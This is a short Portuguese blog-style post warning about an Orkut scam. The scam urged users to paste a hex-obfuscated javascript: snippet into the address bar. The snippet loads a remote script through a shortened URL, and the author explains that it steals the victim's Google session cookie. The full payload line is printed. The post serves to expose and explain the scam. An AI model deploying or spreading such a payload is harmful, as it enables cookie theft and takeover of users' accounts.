Um certo dia estava eu navegando no orkut e recebi uma mensagem que prometia a invasão de uma conta qualquer do orkut através de um script.

Segundo o autor eu deveria entrar no perfil da pessoa escolhida e colar na barra de endereços esse código:

javascript:d=document.createElement('SCRIPT'); d.src='%68%74%74%70%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F %6D%2F%32%64%6E%6F%6B%32'; document.getElementsByTagName('head').item(0).appendChild(d);void(0)

Só que desconfiado como sou, resolvi fazer o seguinte, não confiar nesse script por ter no seu código hexadecimais que o navegador interpreta como caracteres normais.

Como conheço a codificação hexadecimal, resolvi traduzir esse comando, e para a surpresa de todos menos a minha, esse script faz uma chamada a outro script hospedado em uma página fora do orkut e o resultado final é:

Quando você clica nele está autorizando o script a copiar o cookie do orkut no seu computador para o computador do criador dele, dando a esse camarada acesso total à sua conta no Google... isso mesmo! Estamos falando de acesso total ao Gmail, Orkut, Google reader, etc.

Baseado nessa experiência resolvi criar um script em Java que vai codificar e decodificar as palavras para Hexadecimal e Unicode.